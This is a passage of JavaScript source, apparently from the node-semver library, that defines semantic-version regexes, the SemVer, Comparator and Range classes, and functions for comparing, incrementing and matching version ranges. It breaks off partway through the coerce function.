tok('XRANGELOOSE')
src[t.XRANGELOOSE] = '^' + src[t.GTLT] + '\\s*' + src[t.XRANGEPLAINLOOSE] + '$'
// Coercion.
// Extract anything that could conceivably be a part of a valid semver
tok('COERCE')
src[t.COERCE] = '(^|[^\\d])' +
'(\\d{1,' + MAX_SAFE_COMPONENT_LENGTH + '})' +
'(?:\\.(\\d{1,' + MAX_SAFE_COMPONENT_LENGTH + '}))?' +
'(?:\\.(\\d{1,' + MAX_SAFE_COMPONENT_LENGTH + '}))?' +
'(?:$|[^\\d])'
tok('COERCERTL')
re[t.COERCERTL] = new RegExp(src[t.COERCE], 'g')
// Tilde ranges.
// Meaning is "reasonably at or greater than"
tok('LONETILDE')
src[t.LONETILDE] = '(?:~>?)'
tok('TILDETRIM')
src[t.TILDETRIM] = '(\\s*)' + src[t.LONETILDE] + '\\s+'
re[t.TILDETRIM] = new RegExp(src[t.TILDETRIM], 'g')
var tildeTrimReplace = '$1~'
tok('TILDE')
src[t.TILDE] = '^' + src[t.LONETILDE] + src[t.XRANGEPLAIN] + '$'
tok('TILDELOOSE')
src[t.TILDELOOSE] = '^' + src[t.LONETILDE] + src[t.XRANGEPLAINLOOSE] + '$'
// Caret ranges.
// Meaning is "at least and backwards compatible with"
tok('LONECARET')
src[t.LONECARET] = '(?:\\^)'
tok('CARETTRIM')
src[t.CARETTRIM] = '(\\s*)' + src[t.LONECARET] + '\\s+'
re[t.CARETTRIM] = new RegExp(src[t.CARETTRIM], 'g')
var caretTrimReplace = '$1^'
tok('CARET')
src[t.CARET] = '^' + src[t.LONECARET] + src[t.XRANGEPLAIN] + '$'
tok('CARETLOOSE')
src[t.CARETLOOSE] = '^' + src[t.LONECARET] + src[t.XRANGEPLAINLOOSE] + '$'
// A simple gt/lt/eq thing, or just "" to indicate "any version"
tok('COMPARATORLOOSE')
src[t.COMPARATORLOOSE] = '^' + src[t.GTLT] + '\\s*(' + src[t.LOOSEPLAIN] + ')$|^$'
tok('COMPARATOR')
src[t.COMPARATOR] = '^' + src[t.GTLT] + '\\s*(' + src[t.FULLPLAIN] + ')$|^$'
// An expression to strip any whitespace between the gtlt and the thing
// it modifies, so that `> 1.2.3` ==> `>1.2.3`
tok('COMPARATORTRIM')
src[t.COMPARATORTRIM] = '(\\s*)' + src[t.GTLT] +
'\\s*(' + src[t.LOOSEPLAIN] + '|' + src[t.XRANGEPLAIN] + ')'
// this one has to use the /g flag
re[t.COMPARATORTRIM] = new RegExp(src[t.COMPARATORTRIM], 'g')
var comparatorTrimReplace = '$1$2$3'
// Something like `1.2.3 - 1.2.4`
// Note that these all use the loose form, because they'll be
// checked against either the strict or loose comparator form
// later.
tok('HYPHENRANGE')
src[t.HYPHENRANGE] = '^\\s*(' + src[t.XRANGEPLAIN] + ')' +
'\\s+-\\s+' +
'(' + src[t.XRANGEPLAIN] + ')' +
'\\s*$'
tok('HYPHENRANGELOOSE')
src[t.HYPHENRANGELOOSE] = '^\\s*(' + src[t.XRANGEPLAINLOOSE] + ')' +
'\\s+-\\s+' +
'(' + src[t.XRANGEPLAINLOOSE] + ')' +
'\\s*$'
// Star ranges basically just allow anything at all.
tok('STAR')
src[t.STAR] = '(<|>)?=?\\s*\\*'
// Compile to actual regexp objects.
// All are flag-free, unless they were created above with a flag.
for (var i = 0; i < R; i++) {
debug(i, src[i])
if (!re[i]) {
re[i] = new RegExp(src[i])
}
}
exports.parse = parse
function parse (version, options) {
if (!options || typeof options !== 'object') {
options = {
loose: !!options,
includePrerelease: false
}
}
if (version instanceof SemVer) {
return version
}
if (typeof version !== 'string') {
return null
}
if (version.length > MAX_LENGTH) {
return null
}
var r = options.loose ? re[t.LOOSE] : re[t.FULL]
if (!r.test(version)) {
return null
}
try {
return new SemVer(version, options)
} catch (er) {
return null
}
}
exports.valid = valid
function valid (version, options) {
var v = parse(version, options)
return v ? v.version : null
}
exports.clean = clean
function clean (version, options) {
var s = parse(version.trim().replace(/^[=v]+/, ''), options)
return s ? s.version : null
}
exports.SemVer = SemVer
function SemVer (version, options) {
if (!options || typeof options !== 'object') {
options = {
loose: !!options,
includePrerelease: false
}
}
if (version instanceof SemVer) {
if (version.loose === options.loose) {
return version
} else {
version = version.version
}
} else if (typeof version !== 'string') {
throw new TypeError('Invalid Version: ' + version)
}
if (version.length > MAX_LENGTH) {
throw new TypeError('version is longer than ' + MAX_LENGTH + ' characters')
}
if (!(this instanceof SemVer)) {
return new SemVer(version, options)
}
debug('SemVer', version, options)
this.options = options
this.loose = !!options.loose
var m = version.trim().match(options.loose ? re[t.LOOSE] : re[t.FULL])
if (!m) {
throw new TypeError('Invalid Version: ' + version)
}
this.raw = version
// these are actually numbers
this.major = +m[1]
this.minor = +m[2]
this.patch = +m[3]
if (this.major > MAX_SAFE_INTEGER || this.major < 0) {
throw new TypeError('Invalid major version')
}
if (this.minor > MAX_SAFE_INTEGER || this.minor < 0) {
throw new TypeError('Invalid minor version')
}
if (this.patch > MAX_SAFE_INTEGER || this.patch < 0) {
throw new TypeError('Invalid patch version')
}
// numberify any prerelease numeric ids
if (!m[4]) {
this.prerelease = []
} else {
this.prerelease = m[4].split('.').map(function (id) {
if (/^[0-9]+$/.test(id)) {
var num = +id
if (num >= 0 && num < MAX_SAFE_INTEGER) {
return num
}
}
return id
})
}
this.build = m[5] ? m[5].split('.') : []
this.format()
}
SemVer.prototype.format = function () {
this.version = this.major + '.' + this.minor + '.' + this.patch
if (this.prerelease.length) {
this.version += '-' + this.prerelease.join('.')
}
return this.version
}
SemVer.prototype.toString = function () {
return this.version
}
SemVer.prototype.compare = function (other) {
debug('SemVer.compare', this.version, this.options, other)
if (!(other instanceof SemVer)) {
other = new SemVer(other, this.options)
}
return this.compareMain(other) || this.comparePre(other)
}
SemVer.prototype.compareMain = function (other) {
if (!(other instanceof SemVer)) {
other = new SemVer(other, this.options)
}
return compareIdentifiers(this.major, other.major) ||
compareIdentifiers(this.minor, other.minor) ||
compareIdentifiers(this.patch, other.patch)
}
SemVer.prototype.comparePre = function (other) {
if (!(other instanceof SemVer)) {
other = new SemVer(other, this.options)
}
// NOT having a prerelease is > having one
if (this.prerelease.length && !other.prerelease.length) {
return -1
} else if (!this.prerelease.length && other.prerelease.length) {
return 1
} else if (!this.prerelease.length && !other.prerelease.length) {
return 0
}
var i = 0
do {
var a = this.prerelease[i]
var b = other.prerelease[i]
debug('prerelease compare', i, a, b)
if (a === undefined && b === undefined) {
return 0
} else if (b === undefined) {
return 1
} else if (a === undefined) {
return -1
} else if (a === b) {
continue
} else {
return compareIdentifiers(a, b)
}
} while (++i)
}
SemVer.prototype.compareBuild = function (other) {
if (!(other instanceof SemVer)) {
other = new SemVer(other, this.options)
}
var i = 0
do {
var a = this.build[i]
var b = other.build[i]
debug('prerelease compare', i, a, b)
if (a === undefined && b === undefined) {
return 0
} else if (b === undefined) {
return 1
} else if (a === undefined) {
return -1
} else if (a === b) {
continue
} else {
return compareIdentifiers(a, b)
}
} while (++i)
}
// preminor will bump the version up to the next minor release, and immediately
// down to pre-release. premajor and prepatch work the same way.
SemVer.prototype.inc = function (release, identifier) {
switch (release) {
case 'premajor':
this.prerelease.length = 0
this.patch = 0
this.minor = 0
this.major++
this.inc('pre', identifier)
break
case 'preminor':
this.prerelease.length = 0
this.patch = 0
this.minor++
this.inc('pre', identifier)
break
case 'prepatch':
// If this is already a prerelease, it will bump to the next version
// drop any prereleases that might already exist, since they are not
// relevant at this point.
this.prerelease.length = 0
this.inc('patch', identifier)
this.inc('pre', identifier)
break
// If the input is a non-prerelease version, this acts the same as
// prepatch.
case 'prerelease':
if (this.prerelease.length === 0) {
this.inc('patch', identifier)
}
this.inc('pre', identifier)
break
case 'major':
// If this is a pre-major version, bump up to the same major version.
// Otherwise increment major.
// 1.0.0-5 bumps to 1.0.0
// 1.1.0 bumps to 2.0.0
if (this.minor !== 0 ||
this.patch !== 0 ||
this.prerelease.length === 0) {
this.major++
}
this.minor = 0
this.patch = 0
this.prerelease = []
break
case 'minor':
// If this is a pre-minor version, bump up to the same minor version.
// Otherwise increment minor.
// 1.2.0-5 bumps to 1.2.0
// 1.2.1 bumps to 1.3.0
if (this.patch !== 0 || this.prerelease.length === 0) {
this.minor++
}
this.patch = 0
this.prerelease = []
break
case 'patch':
// If this is not a pre-release version, it will increment the patch.
// If it is a pre-release it will bump up to the same patch version.
// 1.2.0-5 patches to 1.2.0
// 1.2.0 patches to 1.2.1
if (this.prerelease.length === 0) {
this.patch++
}
this.prerelease = []
break
// This probably shouldn't be used publicly.
// 1.0.0 "pre" would become 1.0.0-0 which is the wrong direction.
case 'pre':
if (this.prerelease.length === 0) {
this.prerelease = [0]
} else {
var i = this.prerelease.length
while (--i >= 0) {
if (typeof this.prerelease[i] === 'number') {
this.prerelease[i]++
i = -2
}
}
if (i === -1) {
// didn't increment anything
this.prerelease.push(0)
}
}
if (identifier) {
// 1.2.0-beta.1 bumps to 1.2.0-beta.2,
// 1.2.0-beta.fooblz or 1.2.0-beta bumps to 1.2.0-beta.0
if (this.prerelease[0] === identifier) {
if (isNaN(this.prerelease[1])) {
this.prerelease = [identifier, 0]
}
} else {
this.prerelease = [identifier, 0]
}
}
break
default:
throw new Error('invalid increment argument: ' + release)
}
this.format()
this.raw = this.version
return this
}
exports.inc = inc
function inc (version, release, loose, identifier) {
if (typeof (loose) === 'string') {
identifier = loose
loose = undefined
}
try {
return new SemVer(version, loose).inc(release, identifier).version
} catch (er) {
return null
}
}
exports.diff = diff
function diff (version1, version2) {
if (eq(version1, version2)) {
return null
} else {
var v1 = parse(version1)
var v2 = parse(version2)
var prefix = ''
if (v1.prerelease.length || v2.prerelease.length) {
prefix = 'pre'
var defaultResult = 'prerelease'
}
for (var key in v1) {
if (key === 'major' || key === 'minor' || key === 'patch') {
if (v1[key] !== v2[key]) {
return prefix + key
}
}
}
return defaultResult // may be undefined
}
}
exports.compareIdentifiers = compareIdentifiers
var numeric = /^[0-9]+$/
function compareIdentifiers (a, b) {
var anum = numeric.test(a)
var bnum = numeric.test(b)
if (anum && bnum) {
a = +a
b = +b
}
return a === b ? 0
: (anum && !bnum) ? -1
: (bnum && !anum) ? 1
: a < b ? -1
: 1
}
exports.rcompareIdentifiers = rcompareIdentifiers
function rcompareIdentifiers (a, b) {
return compareIdentifiers(b, a)
}
exports.major = major
function major (a, loose) {
return new SemVer(a, loose).major
}
exports.minor = minor
function minor (a, loose) {
return new SemVer(a, loose).minor
}
exports.patch = patch
function patch (a, loose) {
return new SemVer(a, loose).patch
}
exports.compare = compare
function compare (a, b, loose) {
return new SemVer(a, loose).compare(new SemVer(b, loose))
}
exports.compareLoose = compareLoose
function compareLoose (a, b) {
return compare(a, b, true)
}
exports.compareBuild = compareBuild
function compareBuild (a, b, loose) {
var versionA = new SemVer(a, loose)
var versionB = new SemVer(b, loose)
return versionA.compare(versionB) || versionA.compareBuild(versionB)
}
exports.rcompare = rcompare
function rcompare (a, b, loose) {
return compare(b, a, loose)
}
exports.sort = sort
function sort (list, loose) {
return list.sort(function (a, b) {
return exports.compareBuild(a, b, loose)
})
}
exports.rsort = rsort
function rsort (list, loose) {
return list.sort(function (a, b) {
return exports.compareBuild(b, a, loose)
})
}
exports.gt = gt
function gt (a, b, loose) {
return compare(a, b, loose) > 0
}
exports.lt = lt
function lt (a, b, loose) {
return compare(a, b, loose) < 0
}
exports.eq = eq
function eq (a, b, loose) {
return compare(a, b, loose) === 0
}
exports.neq = neq
function neq (a, b, loose) {
return compare(a, b, loose) !== 0
}
exports.gte = gte
function gte (a, b, loose) {
return compare(a, b, loose) >= 0
}
exports.lte = lte
function lte (a, b, loose) {
return compare(a, b, loose) <= 0
}
exports.cmp = cmp
function cmp (a, op, b, loose) {
switch (op) {
case '===':
if (typeof a === 'object')
a = a.version
if (typeof b === 'object')
b = b.version
return a === b
case '!==':
if (typeof a === 'object')
a = a.version
if (typeof b === 'object')
b = b.version
return a !== b
case '':
case '=':
case '==':
return eq(a, b, loose)
case '!=':
return neq(a, b, loose)
case '>':
return gt(a, b, loose)
case '>=':
return gte(a, b, loose)
case '<':
return lt(a, b, loose)
case '<=':
return lte(a, b, loose)
default:
throw new TypeError('Invalid operator: ' + op)
}
}
exports.Comparator = Comparator
function Comparator (comp, options) {
if (!options || typeof options !== 'object') {
options = {
loose: !!options,
includePrerelease: false
}
}
if (comp instanceof Comparator) {
if (comp.loose === !!options.loose) {
return comp
} else {
comp = comp.value
}
}
if (!(this instanceof Comparator)) {
return new Comparator(comp, options)
}
debug('comparator', comp, options)
this.options = options
this.loose = !!options.loose
this.parse(comp)
if (this.semver === ANY) {
this.value = ''
} else {
this.value = this.operator + this.semver.version
}
debug('comp', this)
}
var ANY = {}
Comparator.prototype.parse = function (comp) {
var r = this.options.loose ? re[t.COMPARATORLOOSE] : re[t.COMPARATOR]
var m = comp.match(r)
if (!m) {
throw new TypeError('Invalid comparator: ' + comp)
}
this.operator = m[1] !== undefined ? m[1] : ''
if (this.operator === '=') {
this.operator = ''
}
// if it literally is just '>' or '' then allow anything.
if (!m[2]) {
this.semver = ANY
} else {
this.semver = new SemVer(m[2], this.options.loose)
}
}
Comparator.prototype.toString = function () {
return this.value
}
Comparator.prototype.test = function (version) {
debug('Comparator.test', version, this.options.loose)
if (this.semver === ANY || version === ANY) {
return true
}
if (typeof version === 'string') {
try {
version = new SemVer(version, this.options)
} catch (er) {
return false
}
}
return cmp(version, this.operator, this.semver, this.options)
}
Comparator.prototype.intersects = function (comp, options) {
if (!(comp instanceof Comparator)) {
throw new TypeError('a Comparator is required')
}
if (!options || typeof options !== 'object') {
options = {
loose: !!options,
includePrerelease: false
}
}
var rangeTmp
if (this.operator === '') {
if (this.value === '') {
return true
}
rangeTmp = new Range(comp.value, options)
return satisfies(this.value, rangeTmp, options)
} else if (comp.operator === '') {
if (comp.value === '') {
return true
}
rangeTmp = new Range(this.value, options)
return satisfies(comp.semver, rangeTmp, options)
}
var sameDirectionIncreasing =
(this.operator === '>=' || this.operator === '>') &&
(comp.operator === '>=' || comp.operator === '>')
var sameDirectionDecreasing =
(this.operator === '<=' || this.operator === '<') &&
(comp.operator === '<=' || comp.operator === '<')
var sameSemVer = this.semver.version === comp.semver.version
var differentDirectionsInclusive =
(this.operator === '>=' || this.operator === '<=') &&
(comp.operator === '>=' || comp.operator === '<=')
var oppositeDirectionsLessThan =
cmp(this.semver, '<', comp.semver, options) &&
((this.operator === '>=' || this.operator === '>') &&
(comp.operator === '<=' || comp.operator === '<'))
var oppositeDirectionsGreaterThan =
cmp(this.semver, '>', comp.semver, options) &&
((this.operator === '<=' || this.operator === '<') &&
(comp.operator === '>=' || comp.operator === '>'))
return sameDirectionIncreasing || sameDirectionDecreasing ||
(sameSemVer && differentDirectionsInclusive) ||
oppositeDirectionsLessThan || oppositeDirectionsGreaterThan
}
exports.Range = Range
function Range (range, options) {
if (!options || typeof options !== 'object') {
options = {
loose: !!options,
includePrerelease: false
}
}
if (range instanceof Range) {
if (range.loose === !!options.loose &&
range.includePrerelease === !!options.includePrerelease) {
return range
} else {
return new Range(range.raw, options)
}
}
if (range instanceof Comparator) {
return new Range(range.value, options)
}
if (!(this instanceof Range)) {
return new Range(range, options)
}
this.options = options
this.loose = !!options.loose
this.includePrerelease = !!options.includePrerelease
// First, split based on boolean or ||
this.raw = range
this.set = range.split(/\s*\|\|\s*/).map(function (range) {
return this.parseRange(range.trim())
}, this).filter(function (c) {
// throw out any that are not relevant for whatever reason
return c.length
})
if (!this.set.length) {
throw new TypeError('Invalid SemVer Range: ' + range)
}
this.format()
}
Range.prototype.format = function () {
this.range = this.set.map(function (comps) {
return comps.join(' ').trim()
}).join('||').trim()
return this.range
}
Range.prototype.toString = function () {
return this.range
}
Range.prototype.parseRange = function (range) {
var loose = this.options.loose
range = range.trim()
// `1.2.3 - 1.2.4` => `>=1.2.3 <=1.2.4`
var hr = loose ? re[t.HYPHENRANGELOOSE] : re[t.HYPHENRANGE]
range = range.replace(hr, hyphenReplace)
debug('hyphen replace', range)
// `> 1.2.3 < 1.2.5` => `>1.2.3 <1.2.5`
range = range.replace(re[t.COMPARATORTRIM], comparatorTrimReplace)
debug('comparator trim', range, re[t.COMPARATORTRIM])
// `~ 1.2.3` => `~1.2.3`
range = range.replace(re[t.TILDETRIM], tildeTrimReplace)
// `^ 1.2.3` => `^1.2.3`
range = range.replace(re[t.CARETTRIM], caretTrimReplace)
// normalize spaces
range = range.split(/\s+/).join(' ')
// At this point, the range is completely trimmed and
// ready to be split into comparators.
var compRe = loose ? re[t.COMPARATORLOOSE] : re[t.COMPARATOR]
var set = range.split(' ').map(function (comp) {
return parseComparator(comp, this.options)
}, this).join(' ').split(/\s+/)
if (this.options.loose) {
// in loose mode, throw out any that are not valid comparators
set = set.filter(function (comp) {
return !!comp.match(compRe)
})
}
set = set.map(function (comp) {
return new Comparator(comp, this.options)
}, this)
return set
}
Range.prototype.intersects = function (range, options) {
if (!(range instanceof Range)) {
throw new TypeError('a Range is required')
}
return this.set.some(function (thisComparators) {
return (
isSatisfiable(thisComparators, options) &&
range.set.some(function (rangeComparators) {
return (
isSatisfiable(rangeComparators, options) &&
thisComparators.every(function (thisComparator) {
return rangeComparators.every(function (rangeComparator) {
return thisComparator.intersects(rangeComparator, options)
})
})
)
})
)
})
}
// take a set of comparators and determine whether there
// exists a version which can satisfy it
function isSatisfiable (comparators, options) {
var result = true
var remainingComparators = comparators.slice()
var testComparator = remainingComparators.pop()
while (result && remainingComparators.length) {
result = remainingComparators.every(function (otherComparator) {
return testComparator.intersects(otherComparator, options)
})
testComparator = remainingComparators.pop()
}
return result
}
// Mostly just for testing and legacy API reasons
exports.toComparators = toComparators
function toComparators (range, options) {
return new Range(range, options).set.map(function (comp) {
return comp.map(function (c) {
return c.value
}).join(' ').trim().split(' ')
})
}
// comprised of xranges, tildes, stars, and gtlt's at this point.
// already replaced the hyphen ranges
// turn into a set of JUST comparators.
function parseComparator (comp, options) {
debug('comp', comp, options)
comp = replaceCarets(comp, options)
debug('caret', comp)
comp = replaceTildes(comp, options)
debug('tildes', comp)
comp = replaceXRanges(comp, options)
debug('xrange', comp)
comp = replaceStars(comp, options)
debug('stars', comp)
return comp
}
function isX (id) {
return !id || id.toLowerCase() === 'x' || id === '*'
}
// ~, ~> --> * (any, kinda silly)
// ~2, ~2.x, ~2.x.x, ~>2, ~>2.x ~>2.x.x --> >=2.0.0 <3.0.0
// ~2.0, ~2.0.x, ~>2.0, ~>2.0.x --> >=2.0.0 <2.1.0
// ~1.2, ~1.2.x, ~>1.2, ~>1.2.x --> >=1.2.0 <1.3.0
// ~1.2.3, ~>1.2.3 --> >=1.2.3 <1.3.0
// ~1.2.0, ~>1.2.0 --> >=1.2.0 <1.3.0
function replaceTildes (comp, options) {
return comp.trim().split(/\s+/).map(function (comp) {
return replaceTilde(comp, options)
}).join(' ')
}
function replaceTilde (comp, options) {
var r = options.loose ? re[t.TILDELOOSE] : re[t.TILDE]
return comp.replace(r, function (_, M, m, p, pr) {
debug('tilde', comp, _, M, m, p, pr)
var ret
if (isX(M)) {
ret = ''
} else if (isX(m)) {
ret = '>=' + M + '.0.0 <' + (+M + 1) + '.0.0'
} else if (isX(p)) {
// ~1.2 == >=1.2.0 <1.3.0
ret = '>=' + M + '.' + m + '.0 <' + M + '.' + (+m + 1) + '.0'
} else if (pr) {
debug('replaceTilde pr', pr)
ret = '>=' + M + '.' + m + '.' + p + '-' + pr +
' <' + M + '.' + (+m + 1) + '.0'
} else {
// ~1.2.3 == >=1.2.3 <1.3.0
ret = '>=' + M + '.' + m + '.' + p +
' <' + M + '.' + (+m + 1) + '.0'
}
debug('tilde return', ret)
return ret
})
}
// ^ --> * (any, kinda silly)
// ^2, ^2.x, ^2.x.x --> >=2.0.0 <3.0.0
// ^2.0, ^2.0.x --> >=2.0.0 <3.0.0
// ^1.2, ^1.2.x --> >=1.2.0 <2.0.0
// ^1.2.3 --> >=1.2.3 <2.0.0
// ^1.2.0 --> >=1.2.0 <2.0.0
function replaceCarets (comp, options) {
return comp.trim().split(/\s+/).map(function (comp) {
return replaceCaret(comp, options)
}).join(' ')
}
function replaceCaret (comp, options) {
debug('caret', comp, options)
var r = options.loose ? re[t.CARETLOOSE] : re[t.CARET]
return comp.replace(r, function (_, M, m, p, pr) {
debug('caret', comp, _, M, m, p, pr)
var ret
if (isX(M)) {
ret = ''
} else if (isX(m)) {
ret = '>=' + M + '.0.0 <' + (+M + 1) + '.0.0'
} else if (isX(p)) {
if (M === '0') {
ret = '>=' + M + '.' + m + '.0 <' + M + '.' + (+m + 1) + '.0'
} else {
ret = '>=' + M + '.' + m + '.0 <' + (+M + 1) + '.0.0'
}
} else if (pr) {
debug('replaceCaret pr', pr)
if (M === '0') {
if (m === '0') {
ret = '>=' + M + '.' + m + '.' + p + '-' + pr +
' <' + M + '.' + m + '.' + (+p + 1)
} else {
ret = '>=' + M + '.' + m + '.' + p + '-' + pr +
' <' + M + '.' + (+m + 1) + '.0'
}
} else {
ret = '>=' + M + '.' + m + '.' + p + '-' + pr +
' <' + (+M + 1) + '.0.0'
}
} else {
debug('no pr')
if (M === '0') {
if (m === '0') {
ret = '>=' + M + '.' + m + '.' + p +
' <' + M + '.' + m + '.' + (+p + 1)
} else {
ret = '>=' + M + '.' + m + '.' + p +
' <' + M + '.' + (+m + 1) + '.0'
}
} else {
ret = '>=' + M + '.' + m + '.' + p +
' <' + (+M + 1) + '.0.0'
}
}
debug('caret return', ret)
return ret
})
}
function replaceXRanges (comp, options) {
debug('replaceXRanges', comp, options)
return comp.split(/\s+/).map(function (comp) {
return replaceXRange(comp, options)
}).join(' ')
}
function replaceXRange (comp, options) {
comp = comp.trim()
var r = options.loose ? re[t.XRANGELOOSE] : re[t.XRANGE]
return comp.replace(r, function (ret, gtlt, M, m, p, pr) {
debug('xRange', comp, ret, gtlt, M, m, p, pr)
var xM = isX(M)
var xm = xM || isX(m)
var xp = xm || isX(p)
var anyX = xp
if (gtlt === '=' && anyX) {
gtlt = ''
}
// if we're including prereleases in the match, then we need
// to fix this to -0, the lowest possible prerelease value
pr = options.includePrerelease ? '-0' : ''
if (xM) {
if (gtlt === '>' || gtlt === '<') {
// nothing is allowed
ret = '<0.0.0-0'
} else {
// nothing is forbidden
ret = '*'
}
} else if (gtlt && anyX) {
// we know patch is an x, because we have any x at all.
// replace X with 0
if (xm) {
m = 0
}
p = 0
if (gtlt === '>') {
// >1 => >=2.0.0
// >1.2 => >=1.3.0
// >1.2.3 => >= 1.2.4
gtlt = '>='
if (xm) {
M = +M + 1
m = 0
p = 0
} else {
m = +m + 1
p = 0
}
} else if (gtlt === '<=') {
// <=0.7.x is actually <0.8.0, since any 0.7.x should
// pass. Similarly, <=7.x is actually <8.0.0, etc.
gtlt = '<'
if (xm) {
M = +M + 1
} else {
m = +m + 1
}
}
ret = gtlt + M + '.' + m + '.' + p + pr
} else if (xm) {
ret = '>=' + M + '.0.0' + pr + ' <' + (+M + 1) + '.0.0' + pr
} else if (xp) {
ret = '>=' + M + '.' + m + '.0' + pr +
' <' + M + '.' + (+m + 1) + '.0' + pr
}
debug('xRange return', ret)
return ret
})
}
// Because * is AND-ed with everything else in the comparator,
// and '' means "any version", just remove the *s entirely.
function replaceStars (comp, options) {
debug('replaceStars', comp, options)
// Looseness is ignored here. star is always as loose as it gets!
return comp.trim().replace(re[t.STAR], '')
}
// This function is passed to string.replace(re[t.HYPHENRANGE])
// M, m, patch, prerelease, build
// 1.2 - 3.4.5 => >=1.2.0 <=3.4.5
// 1.2.3 - 3.4 => >=1.2.0 <3.5.0 Any 3.4.x will do
// 1.2 - 3.4 => >=1.2.0 <3.5.0
function hyphenReplace ($0,
from, fM, fm, fp, fpr, fb,
to, tM, tm, tp, tpr, tb) {
if (isX(fM)) {
from = ''
} else if (isX(fm)) {
from = '>=' + fM + '.0.0'
} else if (isX(fp)) {
from = '>=' + fM + '.' + fm + '.0'
} else {
from = '>=' + from
}
if (isX(tM)) {
to = ''
} else if (isX(tm)) {
to = '<' + (+tM + 1) + '.0.0'
} else if (isX(tp)) {
to = '<' + tM + '.' + (+tm + 1) + '.0'
} else if (tpr) {
to = '<=' + tM + '.' + tm + '.' + tp + '-' + tpr
} else {
to = '<=' + to
}
return (from + ' ' + to).trim()
}
// if ANY of the sets match ALL of its comparators, then pass
Range.prototype.test = function (version) {
if (!version) {
return false
}
if (typeof version === 'string') {
try {
version = new SemVer(version, this.options)
} catch (er) {
return false
}
}
for (var i = 0; i < this.set.length; i++) {
if (testSet(this.set[i], version, this.options)) {
return true
}
}
return false
}
function testSet (set, version, options) {
for (var i = 0; i < set.length; i++) {
if (!set[i].test(version)) {
return false
}
}
if (version.prerelease.length && !options.includePrerelease) {
// Find the set of versions that are allowed to have prereleases
// For example, ^1.2.3-pr.1 desugars to >=1.2.3-pr.1 <2.0.0
// That should allow `1.2.3-pr.2` to pass.
// However, `1.2.4-alpha.notready` should NOT be allowed,
// even though it's within the range set by the comparators.
for (i = 0; i < set.length; i++) {
debug(set[i].semver)
if (set[i].semver === ANY) {
continue
}
if (set[i].semver.prerelease.length > 0) {
var allowed = set[i].semver
if (allowed.major === version.major &&
allowed.minor === version.minor &&
allowed.patch === version.patch) {
return true
}
}
}
// Version has a -pre, but it's not one of the ones we like.
return false
}
return true
}
exports.satisfies = satisfies
function satisfies (version, range, options) {
try {
range = new Range(range, options)
} catch (er) {
return false
}
return range.test(version)
}
exports.maxSatisfying = maxSatisfying
function maxSatisfying (versions, range, options) {
var max = null
var maxSV = null
try {
var rangeObj = new Range(range, options)
} catch (er) {
return null
}
versions.forEach(function (v) {
if (rangeObj.test(v)) {
// satisfies(v, range, options)
if (!max || maxSV.compare(v) === -1) {
// compare(max, v, true)
max = v
maxSV = new SemVer(max, options)
}
}
})
return max
}
exports.minSatisfying = minSatisfying
function minSatisfying (versions, range, options) {
var min = null
var minSV = null
try {
var rangeObj = new Range(range, options)
} catch (er) {
return null
}
versions.forEach(function (v) {
if (rangeObj.test(v)) {
// satisfies(v, range, options)
if (!min || minSV.compare(v) === 1) {
// compare(min, v, true)
min = v
minSV = new SemVer(min, options)
}
}
})
return min
}
exports.minVersion = minVersion
function minVersion (range, loose) {
range = new Range(range, loose)
var minver = new SemVer('0.0.0')
if (range.test(minver)) {
return minver
}
minver = new SemVer('0.0.0-0')
if (range.test(minver)) {
return minver
}
minver = null
for (var i = 0; i < range.set.length; ++i) {
var comparators = range.set[i]
comparators.forEach(function (comparator) {
// Clone to avoid manipulating the comparator's semver object.
var compver = new SemVer(comparator.semver.version)
switch (comparator.operator) {
case '>':
if (compver.prerelease.length === 0) {
compver.patch++
} else {
compver.prerelease.push(0)
}
compver.raw = compver.format()
/* fallthrough */
case '':
case '>=':
if (!minver || gt(minver, compver)) {
minver = compver
}
break
case '<':
case '<=':
/* Ignore maximum versions */
break
/* istanbul ignore next */
default:
throw new Error('Unexpected operation: ' + comparator.operator)
}
})
}
if (minver && range.test(minver)) {
return minver
}
return null
}
exports.validRange = validRange
function validRange (range, options) {
try {
// Return '*' instead of '' so that truthiness works.
// This will throw if it's invalid anyway
return new Range(range, options).range || '*'
} catch (er) {
return null
}
}
// Determine if version is less than all the versions possible in the range
exports.ltr = ltr
function ltr (version, range, options) {
return outside(version, range, '<', options)
}
// Determine if version is greater than all the versions possible in the range.
exports.gtr = gtr
function gtr (version, range, options) {
return outside(version, range, '>', options)
}
exports.outside = outside
function outside (version, range, hilo, options) {
version = new SemVer(version, options)
range = new Range(range, options)
var gtfn, ltefn, ltfn, comp, ecomp
switch (hilo) {
case '>':
gtfn = gt
ltefn = lte
ltfn = lt
comp = '>'
ecomp = '>='
break
case '<':
gtfn = lt
ltefn = gte
ltfn = gt
comp = '<'
ecomp = '<='
break
default:
throw new TypeError('Must provide a hilo val of "<" or ">"')
}
// If it satisifes the range it is not outside
if (satisfies(version, range, options)) {
return false
}
// From now on, variable terms are as if we're in "gtr" mode.
// but note that everything is flipped for the "ltr" function.
for (var i = 0; i < range.set.length; ++i) {
var comparators = range.set[i]
var high = null
var low = null
comparators.forEach(function (comparator) {
if (comparator.semver === ANY) {
comparator = new Comparator('>=0.0.0')
}
high = high || comparator
low = low || comparator
if (gtfn(comparator.semver, high.semver, options)) {
high = comparator
} else if (ltfn(comparator.semver, low.semver, options)) {
low = comparator
}
})
// If the edge version comparator has a operator then our version
// isn't outside it
if (high.operator === comp || high.operator === ecomp) {
return false
}
// If the lowest version comparator has an operator and our version
// is less than it then it isn't higher than the range
if ((!low.operator || low.operator === comp) &&
ltefn(version, low.semver)) {
return false
} else if (low.operator === ecomp && ltfn(version, low.semver)) {
return false
}
}
return true
}
exports.prerelease = prerelease
function prerelease (version, options) {
var parsed = parse(version, options)
return (parsed && parsed.prerelease.length) ? parsed.prerelease : null
}
exports.intersects = intersects
function intersects (r1, r2, options) {
r1 = new Range(r1, options)
r2 = new Range(r2, options)
return r1.intersects(r2)
}
exports.coerce = coerce
function coerce (version, options) {
if (version instanceof SemVer) {
return version
}
if (typeof version === 'number') {
version = String(version)
}
if (typeof version !== 'string') {
return null
}
options = options || {}
var match = null
if (!options.rtl) {
match = version.match(re[t.COERCE])
} else {
// Find the right-most coercible string that does not share
// a terminus with a more left-ward coercible string.
// Eg, '1.2.3.4' wants to coerce '2.3.4', not '3.4' or '4'
//
// Walk through the string checking with a /g regexp
// Manually set the index so as to pick up overlapping matches.
// Stop when we get a match that ends at the string end, since no
// coercible string can be more right-ward without the same terminus.
var next
while ((next = re[t.COERCERTL].exec(version)) &&
(!match || match.index + match[0].length !== version.length)
) {
if (!match ||
next.index + next[0].length !== match.index + match[0].length) {
match = next
}
